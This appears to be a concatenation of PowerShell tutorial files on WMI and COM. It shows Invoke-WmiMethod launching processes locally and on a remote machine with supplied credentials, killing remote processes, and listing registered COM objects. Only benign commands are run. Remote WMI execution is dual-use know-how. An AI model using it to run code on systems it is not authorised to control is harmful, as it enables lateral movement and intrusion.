C:\Windows\system32\wbem\wmiprvse.exe notepad.exe C:\Windows\system32\NOTEPAD.EXE PS C:\Users\Administrator> ``` ================================================ FILE: 34-Using-WMI-in-Powershell-Part-3.md ================================================ #### 34. Using WMI in Powershell Part 3 - Explore ```Methods``` of a ```Class``` ```PowerShell PS C:\Users\Administrator> Get-WmiObject -Class Win32_Process -List | Select-Object -ExpandProperty Methods Name : Create InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : Win32_Process Qualifiers : {Constructor, Implemented, MappingStrings, Privileges...} Name : Terminate InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : Win32_Process Qualifiers : {Destructor, Implemented, MappingStrings, Privileges...} Name : GetOwner InParameters : OutParameters : System.Management.ManagementBaseObject Origin : Win32_Process Qualifiers : {Implemented, MappingStrings, ValueMap} Name : GetOwnerSid InParameters : OutParameters : System.Management.ManagementBaseObject Origin : Win32_Process Qualifiers : {Implemented, MappingStrings, ValueMap} Name : SetPriority InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : Win32_Process Qualifiers : {Implemented, MappingStrings, ValueMap} Name : AttachDebugger InParameters : OutParameters : System.Management.ManagementBaseObject Origin : Win32_Process Qualifiers : {Implemented, ValueMap} Name : GetAvailableVirtualSize InParameters : OutParameters : System.Management.ManagementBaseObject Origin : Win32_Process Qualifiers : {Implemented, ValueMap} PS C:\Users\Administrator> ``` - ```Invoke-WmiMethod``` - ```Local``` ```PowerShell PS C:\Users\Administrator> Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "notepad.exe" __GENUS : 2 __CLASS : __PARAMETERS __SUPERCLASS : __DYNASTY : __PARAMETERS __RELPATH : __PROPERTY_COUNT : 2 __DERIVATION : {} __SERVER : __NAMESPACE : __PATH : ProcessId : 1164 ReturnValue : 0 PSComputerName : PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe" __GENUS : 2 __CLASS : __PARAMETERS __SUPERCLASS : __DYNASTY : __PARAMETERS __RELPATH : __PROPERTY_COUNT : 2 __DERIVATION : {} __SERVER : __NAMESPACE : __PATH : ProcessId : 1044 ReturnValue : 0 PSComputerName : PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "powershell.exe" __GENUS : 2 __CLASS : __PARAMETERS __SUPERCLASS : __DYNASTY : __PARAMETERS __RELPATH : __PROPERTY_COUNT : 2 __DERIVATION : {} __SERVER : __NAMESPACE : __PATH : ProcessId : 3996 ReturnValue : 0 PSComputerName : PS C:\Users\Administrator> ``` - ```Invoke-WmiMethod``` - ```Remote``` ```PowerShell PS C:\Users\Administrator> Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "powershell.exe" -ComputerName JOHN-PC -Credential John-PC\John __GENUS : 2 __CLASS : __PARAMETERS __SUPERCLASS : __DYNASTY : __PARAMETERS __RELPATH : __PROPERTY_COUNT : 2 __DERIVATION : {} __SERVER : __NAMESPACE : __PATH : ProcessId : 3536 ReturnValue : 0 PSComputerName : PS C:\Users\Administrator> ``` ```ProcessId``` determines that the command has been executed. - Run ```PowerShell``` commands - ```Local``` ```PowerShell PS C:\Users\Administrator> Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "powershell.exe -c Get-Service" __GENUS : 2 __CLASS : __PARAMETERS __SUPERCLASS : __DYNASTY : __PARAMETERS __RELPATH : __PROPERTY_COUNT : 2 __DERIVATION : {} __SERVER : __NAMESPACE : __PATH : ProcessId : 2412 ReturnValue : 0 PSComputerName : PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "powershell.exe -noexit -c Get-Service" __GENUS : 2 __CLASS : __PARAMETERS __SUPERCLASS : __DYNASTY : __PARAMETERS __RELPATH : __PROPERTY_COUNT : 2 __DERIVATION : {} __SERVER : __NAMESPACE : __PATH : ProcessId : 2096 ReturnValue : 0 PSComputerName : PS C:\Users\Administrator> ``` - Run ```PowerShell``` commands - ```Remote``` ```PowerShell PS C:\Users\Administrator> Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "powershell.exe -noexit -c Get-Service" -ComputerName JOHN-PC -Credential John-PC\John __GENUS : 2 __CLASS : __PARAMETERS __SUPERCLASS : __DYNASTY : __PARAMETERS __RELPATH : __PROPERTY_COUNT : 2 __DERIVATION : {} __SERVER : __NAMESPACE : __PATH : ProcessId : 2280 ReturnValue : 0 PSComputerName : PS C:\Users\Administrator> ``` Check that ```powershell.exe -noexit -c Get-Service``` has executed on the ```remote``` machine ```PowerShell PS C:\Users\Administrator> Get-WmiObject -Class Win32_Process -Filter {Name="powershell.exe"} -ComputerName JOHN-PC -Credential John-PC\John __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3236" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="3236" Caption : powershell.exe CommandLine : "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" CreationClassName : Win32_Process CreationDate : 20170712123353.342056-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : powershell.exe ExecutablePath : C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe ExecutionState : Handle : 3236 HandleCount : 519 InstallDate : KernelModeTime : 3905616 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : powershell.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 4376 OtherTransferCount : 46062 PageFaults : 12085 PageFileUsage : 24428 ParentProcessId : 980 PeakPageFileUsage : 37584 PeakVirtualSize : 195739648 PeakWorkingSetSize : 38424 Priority : 8 PrivatePageCount : 25014272 ProcessId : 3236 QuotaNonPagedPoolUsage : 12 QuotaPagedPoolUsage : 148 QuotaPeakNonPagedPoolUsage : 12 QuotaPeakPagedPoolUsage : 148 ReadOperationCount : 267 ReadTransferCount : 972300 SessionId : 1 Status : TerminationDate : ThreadCount : 5 UserModeTime : 7811232 VirtualSize : 184668160 WindowsVersion : 6.1.7600 WorkingSetSize : 30765056 WriteOperationCount : 3 WriteTransferCount : 6434 PSComputerName : JOHN-PC ProcessName : powershell.exe Handles : 519 VM : 184668160 WS : 30765056 Path : C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3136" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="3136" Caption : powershell.exe CommandLine : "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" CreationClassName : Win32_Process CreationDate : 20170712130457.189342-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : powershell.exe ExecutablePath : C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe ExecutionState : Handle : 3136 HandleCount : 384 InstallDate : KernelModeTime : 1402016 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : powershell.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 3210 OtherTransferCount : 39824 PageFaults : 10441 PageFileUsage : 21412 ParentProcessId : 980 PeakPageFileUsage : 35928 PeakVirtualSize : 180490240 PeakWorkingSetSize : 37160 Priority : 8 PrivatePageCount : 21925888 ProcessId : 3136 QuotaNonPagedPoolUsage : 11 QuotaPagedPoolUsage : 135 QuotaPeakNonPagedPoolUsage : 12 QuotaPeakPagedPoolUsage : 135 ReadOperationCount : 267 ReadTransferCount : 978070 SessionId : 1 Status : TerminationDate : ThreadCount : 5 UserModeTime : 3905616 VirtualSize : 170201088 WindowsVersion : 6.1.7600 WorkingSetSize : 30535680 WriteOperationCount : 3 WriteTransferCount : 6434 PSComputerName : JOHN-PC ProcessName : powershell.exe Handles : 384 VM : 170201088 WS : 30535680 Path : C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3536" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="3536" Caption : powershell.exe CommandLine : powershell.exe CreationClassName : Win32_Process CreationDate : 20170712190711.835494-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : powershell.exe ExecutablePath : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ExecutionState : Handle : 3536 HandleCount : 226 InstallDate : KernelModeTime : 801152 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : powershell.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 2476 OtherTransferCount : 25882 PageFaults : 8693 PageFileUsage : 26280 ParentProcessId : 3656 PeakPageFileUsage : 36124 PeakVirtualSize : 159596544 PeakWorkingSetSize : 33440 Priority : 8 PrivatePageCount : 26910720 ProcessId : 3536 QuotaNonPagedPoolUsage : 10 QuotaPagedPoolUsage : 109 QuotaPeakNonPagedPoolUsage : 11 QuotaPeakPagedPoolUsage : 109 ReadOperationCount : 243 ReadTransferCount : 936885 SessionId : 0 Status : TerminationDate : ThreadCount : 5 UserModeTime : 1602304 VirtualSize : 149045248 WindowsVersion : 6.1.7600 WorkingSetSize : 34164736 WriteOperationCount : 3 WriteTransferCount : 8132 PSComputerName : JOHN-PC ProcessName : powershell.exe Handles : 226 VM : 149045248 WS : 34164736 Path : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="2280" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="2280" Caption : powershell.exe CommandLine : powershell.exe -noexit -c Get-Service CreationClassName : Win32_Process CreationDate : 20170712191345.110997-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : powershell.exe ExecutablePath : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ExecutionState : Handle : 2280 HandleCount : 240 InstallDate : KernelModeTime : 1101584 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : powershell.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 2461 OtherTransferCount : 29198 PageFaults : 9211 PageFileUsage : 25280 ParentProcessId : 2308 PeakPageFileUsage : 36980 PeakVirtualSize : 160145408 PeakWorkingSetSize : 35136 Priority : 8 PrivatePageCount : 25886720 ProcessId : 2280 QuotaNonPagedPoolUsage : 10 QuotaPagedPoolUsage : 109 QuotaPeakNonPagedPoolUsage : 11 QuotaPeakPagedPoolUsage : 110 ReadOperationCount : 243 ReadTransferCount : 932839 SessionId : 0 Status : TerminationDate : ThreadCount : 5 UserModeTime : 2303312 VirtualSize : 149331968 WindowsVersion : 6.1.7600 WorkingSetSize : 34226176 WriteOperationCount : 3 WriteTransferCount : 8132 PSComputerName : JOHN-PC ProcessName : powershell.exe Handles : 240 VM : 149331968 WS : 34226176 Path : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PS C:\Users\Administrator> ``` - Stop ```process``` using ```Remove-WmiObject``` ```PowerShell PS C:\Users\Administrator> Get-WmiObject -Class Win32_Process -Filter {Name="powershell.exe"} -ComputerName JOHN-PC -Credential John-PC\John | Remove-WmiObject ``` ```PowerShell PS C:\Users\Administrator> Get-WmiObject -Class Win32_Process -Filter {Name="powershell.exe"} -ComputerName JOHN-PC -Credential John-PC\John ``` ================================================ FILE: 35-COM-and-Powershell.md ================================================ #### 35. COM and Powershell ###### Exploring COM objects ```COM Objects``` are ```interfaces``` to various ```Windows Applications``` - List all ```COM objects``` ```PowerShell PS C:\> Get-ChildItem REGISTRY::HKEY_CLASSES_ROOT\CLSID -Include PROGID -Recurse | foreach {$_.GetValue("")} file StaticMetafile StaticDib clsid objref ADODB.Command.6.0 ADODB.Parameter.6.0 ADODB.Connection.6.0 ADODB.Recordset.6.0 ADODB.Error.6.0 ADODB.ErrorLookup.6.0 ADODB.Record.6.0 ADODB.Stream.6.0 ADOX.Catalog.6.0 ADOX.Table.6.0 ADOX.Group.6.0 ADOX.User.6.0 ADOX.Column.6.0 ADOX.Index.6.0 ADOX.Key.6.0 lnkfile InternetExplorer.Application.1 PBrush IMsiServer WindowsInstaller.Message WindowsInstaller.Installer IMEAPI.CImeProductObjectJK.15 System.Security.Cryptography.HMACSHA1 DXImageTransform.Microsoft.CrBlinds.1 MSIME.Japan.FEDict.15 IAS.PostEapRestrictions.1 CEIPLuaElevationHelper Propshts.apmSheetEnvironment.1 CertificateAuthority.EncodeCRLDistInfo.1 System.Runtime.Remoting.Metadata.SoapMethodAttribute System.Collections.SortedList PLA.TraceDataProviderCollection.1 PLA.TraceDataProvider.1 PLA.TraceSession.1 PLA.DataCollectorSet.1 PLA.DataCollectorSetCollection.1 PLA.LegacyDataCollectorSet.1 PLA.LegacyDataCollectorSetCollection.1 PLA.LegacyTraceSession.1 PLA.LegacyTraceSessionCollection.1 PLA.TraceSessionCollection.1 PLA.ServerDataCollectorSet.1 PLA.ServerDataCollectorSetCollection.1 PLA.BootTraceSession.1 PLA.BootTraceSessionCollection.1 PLA.SystemDataCollectorSet.1 PLA.SystemDataCollectorSetCollection.1 CImeDictAPILocalWordComment.15 Propshts.apmPageEnvironment.1 ComPlusDebug.CorpubPublish.1 DXImageTransform.Microsoft.Iris.1 Propshts.apmPageFolderGenAdvanced.1 certocm.CertSrvUpgrade.1 Scriptlet.Context Scriptlet.Constructor Scriptlet.Factory script Scriptlet.HostEncode Scriptlet.TypeLib ScriptletHandler.Automation ScriptletHandler.Event ScriptletHandler.ASP ScriptletHandler.Behavior SAPI.SpLexicon.1 KSGenerator.KeystrokeGenerator.1 Wired.Snapin.1 System.Security.Policy.AllMembershipCondition Msxml2.SAXXMLReader PenIMC.PimcSurrogate.4 System.Runtime.InteropServices.COMException Pathname System.ObsoleteAttribute Propshts.apmPagePerformEffects.1 tsuserex.interfaces.1 WScript.Network.1 MMCListPadInfo.MMCListPadInfo.1 Propshts.apmSheetExtension.1 System.Runtime.Remoting.Metadata.W3cXsd2001.SoapInteger SppComApi.TokenActivation.1 CorSymBinder_SxS CorSymReader_SxS SKBMonitor.KeyStrokeMonitor.1 CorSymWriter_SxS VSMGMT.VssSnapshotMgmt.1 FormHost.FormHost.1 GPOAdminCustom.SiteCtrl.1 StdFont StdPicture SSPWorkspace.1 DXImageTransform.Microsoft.AlphaImageLoader.1 SQLOLEDB.1 GPOAdminCustom.WMICollectionCtrl.1 HNetCfg.FwOpenPort HTML.HostEncode ASP.HostEncode System.Reflection.TargetException Scripting.FileSystemObject System.Collections.Generic.KeyNotFoundException SAPI.SpShortcut.1 polmkr.apmGpeApplications.1 GPOAdminCustom.GPOCollectionCtrl.1 Microsoft.JScript.JSAuthor System.Runtime.Remoting.Metadata.W3cXsd2001.SoapNormalizedString ERCLuaSupport.1 Schedule.Service.1 SAPI.SpTextSelectionInformation.1 SeVA.SeVAEngine.1 System.MemberAccessException PeerDraw.PeerDraw.1 Propshts.apmPageRegionalDate.1 System.TypeLoadException System.OperationCanceledException System.Runtime.Remoting.Proxies.ProxyAttribute GPOAdminCustom.GPOCtrl.1 X509Enrollment.CX509EndorsementKey.1 Microsoft.DirectSoundParamEqDMO.1 polmkr.apmGpeUserControl.1 SoftwareDistribution.VistaWebControl.1 SAPI.SpITNProcessor.1 X509Enrollment.CCertificateAttestationChallenge.1 Microsoft.Update.UpdateColl.1 Shell.Application.1 System.Collections.Hashtable System.Globalization.NumberFormatInfo System.Diagnostics.StackFrame System.Runtime.Remoting.Metadata.W3cXsd2001.SoapNmtokens Propshts.apmSheetStartVista.1 polmkr.apmGpeDataSources.1 DXImageTransform.Microsoft.RadialWipe.1 Propshts.apmSheetShortcut.1 DXImageTransform.Microsoft.Fade.1 DXImageTransform.Microsoft.BasicImage.1 JScript WINMGMTS.1 SppComApi.SPPLUAObject.1 ImeCommonAPIClassFactory2052.15 Propshts.apmSheetPowerSchemes.1 polmkr.apmGpeCompControl.1 SeVA.SeVAResults.1 IMEAPI.CImeCommonAPI.15 UPnP.UPnPDeviceFinderEx.1 htmlfile Catsrv.CatalogServer System.Runtime.Serialization.OnDeserializedAttribute GPOAdminCustom.TemplateCtrl.1 CertificateAuthority.EncodeStringArray.1 WorkspaceBroker.WorkspaceBroker.1 Propshts.apmPageFolderGen.1 System.Globalization.KoreanCalendar polmkr.apmGpeDevices.1 System.Diagnostics.DebuggerStepperBoundaryAttribute Propshts.apmPageDesktop.1 Propshts.apmPageRegional.1 IMEPad.SKF.TCIME.15 Propshts.apmPageCommon.1 Propshts.apmPageImdTaskSettings.1 CImeDictAPIDictionaryList.15 WindowsMail.MimeEdit.1 System.Runtime.Serialization.OptionalFieldAttribute certocm.CertEnrollUpgrade.1 CertificateAuthority.EncodeAltName.1 System.Runtime.Hosting.ApplicationActivator CompatContextMenu.CompatContextMenu.1 UPnP.DescriptionDocument.1 Propshts.apmPageStartClassic.1 DXTransform.Microsoft.DXLUTBuilder.1 CLRMetaData.CorMetaDataDispenserRuntime.2 System.Security.Cryptography.DSASignatureDeformatter ScriptedDiag.Engine.1 System.Security.Cryptography.RijndaelManaged dtsh.DetectionAndSharing.1 Microsoft.WINDOWS.SQLLITE.Engine.4.0 System.Security.Cryptography.HMACRIPEMD160 RowPosition.RowPosition.1 System.Runtime.InteropServices.PreserveSigAttribute WinHttp.WinHttpRequest.5.1 ImeCommonAPI1042.15 TAPI.TAPI.1 System.Runtime.Remoting.ObjRef MSDASC.MSDAINITIALIZE.1 DataLinks MSDASCErrorLookup.1 System.Globalization.HebrewCalendar ImeCommonAPIClassFactory1042.15 ADOMD.Catalog.6.0 ADOMD.Cellset.6.0 LDAP LDAPNamespace ADsNamespaces DXImageTransform.Microsoft.ZigZag.1 System.Runtime.Remoting.RemotingException System.Runtime.Remoting.Messaging.RemotingSurrogateSelector WinNTNamespace htmlfile htmlfile_FullWindowEmbed IMAPI2.MsftRawCDImageCreator.1 GPOAdminCustom.OUCtrl.1 ImeCommonAPIClassFactory1028.15 MSIME.Japan.SDDS.15 MS Remote.1 IMAPI2.MsftStreamInterleave.1 IMAPI2.MsftStreamConcatenate.1 IMAPI2.MsftStreamPrng001.1 IMAPI2.MsftStreamZero.1 IMAPI2.MsftDiscFormat2RawCD.1 IMAPI2.MsftDiscFormat2TrackAtOnce.1 IMAPI2.MsftDiscFormat2Data.1 IMAPI2.MsftDiscFormat2Erase.1 IMAPI2.MsftWriteEngine2.1 IMAPI2.MsftDiscRecorder2.1 IMAPI2.MsftDiscMaster2.1 NameTranslate System.Runtime.Remoting.Metadata.W3cXsd2001.SoapIdrefs Microsoft.Windows.Diagnosis.ManagedHost COMSNAP.CPartitionPropPages.1 System.Threading.ThreadInterruptedException System.IO.StringWriter System.Reflection.AmbiguousMatchException ListPad.ListPad.1 Propshts.apmSheetServerManagement.1 ReplProv1.RpcReplProv.1 Microsoft.XMLDOM.1.0 Microsoft.FreeThreadedXMLDOM.1.0 Msxml2.XSLTemplate System.Diagnostics.DebuggerNonUserCodeAttribute Propshts.apmSheetOfflineFiles.1 System.Security.Permissions.GacIdentityPermission System.CannotUnloadAppDomainException SymReader.dia NCProv.NCProvider.1 MTxSpm.SharedPropertyGroupManager.1 bidispl.bidispl.1 EapMschapv2Cfg.EapMschapv2Cfg.1 System.Runtime.Remoting.Metadata.W3cXsd2001.SoapNonPositiveInteger DXImageTransform.Microsoft.Convolution.1 System.Security.Cryptography.HMACSHA256 COMEXPS.CTrkEvntListener HNetCfg.FwRule GPOAdminCustom.DomainCollectionCtrl.1 IMAPI2FS.MsftFileSystemImage.1 IMAPI2FS.BootOptions.1 MMC.WaitDialog.1 Propshts.apmPageFolderGenAdvancedVista.1 System.Runtime.InteropServices.SafeArrayTypeMismatchException Wireless.Snapin.1 System.Runtime.Remoting.Metadata.W3cXsd2001.SoapDate MSExtLocality Theme.Manager.1 DXImageTransform.Microsoft.RandomBars.1 polmkr.apmGpeDrives.1 GPOAdminCustom.PlanningCtrl.1 MsRDP.MsRDP.9 CertificateAuthority.EncodeDateArray.1 HNetCfg.FwMgr IImgCtx mhtmlfile PeerFactory.PeerFactory.1 htafile HtmlDlgHelper.HtmlDlgHelper.1 Trident.HTMLEditor.1 DownloadBehavior.DownloadBehavior.1 LayoutRect.LayoutRect.1 TemplatePrinter.TemplatePrinter.1 DeviceRect.DeviceRect.1 HtmlDlgSafeHelper.HtmlDlgSafeHelper.1 IMEFILES.CImeDictionaryFileCopier.15 svgfile xhtmlfile System.Runtime.Serialization.OnDeserializingAttribute ImgUtil.CoMapMIMEToCLSID.1 Msxml2.SAXXMLReader.3.0 Microsoft.Update.InstallationAgent.1 System.Globalization.StringInfo System.EnterpriseServices.Internal.ServerWebConfig LayoutFolder cttunesvr.CtTuner.1 Rdpvcomapi.RDPViewer.1 Scripting.Encoder PrintConfig.PrinterExtensionManager TDCCtl.TDCCtl.1 DNWithString UPnP.UPnPDescriptionDocumentEx.1 browser_dll.ctlMsiComponentBrowser.2 MSDataShape.1 System.EnterpriseServices.Internal.SoapClientImport System.ParamArrayAttribute JScript9 Author CImeCommentServerPlugInLocal.15 polmkr.apmGpeEnvironment.1 MsTscAx.MsTscAx.3 System.Collections.CaseInsensitiveComparer Propshts.apmPageFileTransfer.1 WebEnrlServer.WebEnrlServer.1 System.EnterpriseServices.RegistrationConfig GPMGMT.GPMAsyncCancel.1 CertificateAuthority.Config.1 Msxml2.XMLSchemaCache System.Globalization.JapaneseCalendar CertificateAuthority.Admin.1 Microsoft.ActiveDirectory.TRLParserInterop.RulesLanguageParserInterop certocm.CertSrvSetupKeyInformation.1 Object.Microsoft.DXTFilter.1 Wired.About.1 System.Security.Policy.GacMembershipCondition SAPI.SpObjectTokenEnum.1 HyperV.AppHealthMonitor System.Security.Cryptography.MACTripleDES DXImageTransform.Microsoft.MaskFilter.1 browser.apmBrowser.2 IMECheckDefaultInputProfile.Japan.15 Microsoft.WINDOWS.SQLLITE.OLEDB.4.0 components.apmPropertySheetObject.1 System.EnterpriseServices.Internal.ComManagedImportUtil DFSRHelper.ServerHealthReport.1 polmkr.apmGpeFiles.1 System.ArgumentNullException Sapi.SpSharedRecognizer.1 polmkr.apmGpeExplorer.1 NODEMGR.MMCProtocol.1 System.Text.UTF7Encoding System.Runtime.Remoting.RemotingTimeoutException MMCTask.MMCTask.1 System.Security.Cryptography.RIPEMD160Managed Tsmmc.Compdata.1 Msxml2.MXXMLWriter.3.0 System.Security.Policy.ApplicationDirectoryMembershipCondition OlePrn.AspHelp.1 System.Threading.ThreadStateException Msxml2.SAXAttributes.3.0 System.AppDomainSetup polmkr.apmGpeFolders.1 components.apmPropertyPageObject.1 Propshts.apmSheetPowerOptions.1 CCWU.ComCallWrapper.1 System.Reflection.AssemblyNameProxy VBScript.RegExp Propshts.apmPageTask.1 DXImageTransform.Microsoft.CrIris.1 ScwAuditExt.Audit.1 System.Security.Cryptography.SignatureDescription System.EventArgs System.ArgumentException FX.Rowset.1 System.Security.Cryptography.RNGCryptoServiceProvider System.Diagnostics.StackTrace System.Diagnostics.SymbolStore.SymDocumentType COMSNAP.COMNSView.1 System.Diagnostics.DebuggerHiddenAttribute Internet.HHCtrl.1 Sapi.SpInprocRecognizer.1 Search.XmlContentFilter.1 ScwSceExt.SCE.1 DXImageTransform.Microsoft.Chroma.1 System.SystemException Microsoft.GroupPolicy.Targeting.GPMTargetingEditor DXImageTransform.Microsoft.CrRadialWipe.1 System.OverflowException NODEMGR.NodeInitObject.1 device.1 Microsoft.JScript.DebugConvert System.Runtime.Remoting.Metadata.W3cXsd2001.SoapIdref OlePrn.DSPrintQueue.1 System.Version System.Security.Cryptography.SHA256Managed components.apmPropertySheetObjectVistaTasks.1 System.IO.IsolatedStorage.IsolatedStorageException ATL.Registrar Control.TaskSymbol.1 browser_dll.ctlDeviceBrowser.2 PTRegTerminal.Class Propshts.apmSheetFileTransfer.1 SAPI.SpNullPhoneConverter.1 System.EnterpriseServices.Internal.AssemblyLocator Propshts.apmPageTaskSchedule.1 System.Collections.Stack polmkr.apmComponentData.1 Propshts.apmPageIniEdit.1 System.Runtime.CompilerServices.CallConvThiscall System.Runtime.Remoting.Metadata.W3cXsd2001.SoapMonthDay Vss.VSSShellExt.1 ITIR.WordWheelBuild.4 ITIR.Query.4 ITIR.ResultSet.4 ITIR.LocalWordWheel.4 ITIR.LocalDatabase.4 ITIR.LocalCatalog.4 ITIR.LocalGroup.4 ITIR.LocalGroupArray.4 ITIR.IndexSearch.4 ITIR.PropertyList.4 ITIR.StdWordBreaker.4 HHCtrl.SystemSort.666 ITIR.SystemSort.4 OldFont MSIME.Japan.FELang.15 System.DllNotFoundException SAPI.SpSharedRecoContext.1 ADs System.Runtime.InteropServices.RegistrationServices System.Security.Cryptography.HMACSHA512 System.Collections.CaseInsensitiveHashCodeProvider polmkr.apmDataObject.1 WbemScripting.SWbemDateTime.1 xmlfile AzRoles.AzPrincipalLocator.1 System.Runtime.Remoting.Channels.TransportHeaders System.Threading.SynchronizationLockException System.Runtime.Remoting.Metadata.W3cXsd2001.SoapDateTime System.IO.FileNotFoundException System.Runtime.CompilerServices.MethodImplAttribute IAS.IASDataStoreComServer.1 MMC20.Application.1 Theme.ThemeThumbnail.1 browser_dll.apmUserUpdater.2 Propshts.apmPageVpnOptions.1 DXImageTransform.Microsoft.Spiral.1 MMC.SnapInFailureReporter.1 DXImageTransform.Microsoft.Matrix.1 Mts.MtsGrp System.Runtime.CompilerServices.CompilerGlobalScopeAttribute ERCLuaElevationHelper System.Runtime.InteropServices.SafeArrayRankMismatchException System.AccessViolationException CertificateAuthority.ServerExit.1 ScwServiceExt.Service.1 System.Security.Cryptography.X509Certificates.X509Certificate imkrhjd.hanjadic.15 FilePlaybackTerminal.FilePlaybackTerminal.1 Microsoft.Update.Session.1 DXImageTransform.Microsoft.Pixelate.1 System.Security.Cryptography.RSAOAEPKeyExchangeDeformatter Msxml2.SAXAttributes MSP.MSP.2 MSExtUser CertificateAuthority.EncodeLongArray.1 EventSystem.EventSystem.1 System.Runtime.Remoting.Metadata.W3cXsd2001.SoapName System.Random Propshts.apmPagePowerAdvancedVista.1 MsTscAx.MsTscAx.6 MsRDP.MsRDP.5 MsRDP.MsRDP.4 WorkspaceRuntime.Workspace.1 System.Runtime.Serialization.ObjectIDGenerator OlePrn.OleSNMP.1 ImePlugInDictDictionaryList1041.15 Propshts.apmPageMachineSelect.1 System.Runtime.Serialization.Formatters.Binary.BinaryFormatter ImeLmTestApi1041.15 System.STAThreadAttribute ADSystemInfo Propshts.apmPageRegistryBrowser.1 Propshts.apmPageTaskActionsVista.1 Propshts.apmPageTaskConditionsVista.1 Propshts.apmPageTaskGeneralVista.1 Propshts.apmPageTaskSettingsVista.1 Propshts.apmPageTaskTriggersVista.1 Propshts.apmPageFolderOffFiles.1 browser_dll.ctlVPNBrowser.2 polmkr.apmGpeIniFile.1 IMAPI.MSDiscRecorderObj.1 IMAPI.MSDiscMasterObj.1 License.Manager.1 xmlfile Internet.HHCtrl.1 System.Runtime.Remoting.InternalRemotingServices polmkr.apmGpeCompRoot.1 MMCCtrl.MMCCtrl.1 Propshts.apmPageSecurity.1 ADsDSOObject Propshts.apmPageStart.1 MDACVer.Version.6.0 MsRDP.MsRDP.4.a MsTscAx.MsTscAx.8 Microsoft.XMLDSO.1.0 ShellNameSpace.ShellNameSpace.1 System.Runtime.Remoting.Contexts.SynchronizationAttribute SMEF.SMEFRegistrar.1 System.Security.AllowPartiallyTrustedCallersAttribute WSHController Microsoft.WINDOWS.SQLLITE.Params.4.0 System.Runtime.Serialization.SerializationException Propshts.apmPageSecurityAuditing.1 WbemScripting.SWbemObjectPath.1 RdpCoreTS.WRdsProtocolManager.1 System.MissingMethodException System.IO.EndOfStreamException FX.Rowset.1 System.Runtime.CompilerServices.IUnknownConstantAttribute System.Diagnostics.SymbolStore.SymLanguageType Propshts.apmSheetImdTask.1 CImeDictAPIBlockBinder.15 Search.SettingContentFilter.1 DXImageTransform.Microsoft.Wheel.1 System.Runtime.Remoting.Metadata.SoapFieldAttribute polmkr.apmGpeUserRoot.1 Microsoft.Update.Downloader.1 GPOAdminCustom.SiteCollectionCtrl.1 Propshts.apmSheetDataSource.1 AzRoles.AzBizRuleContext.1 System.Runtime.Remoting.Channels.ServerChannelSinkStack System.Globalization.JulianCalendar HNetCfg.HNetShare.1 WMICntl.WMISnapin.1 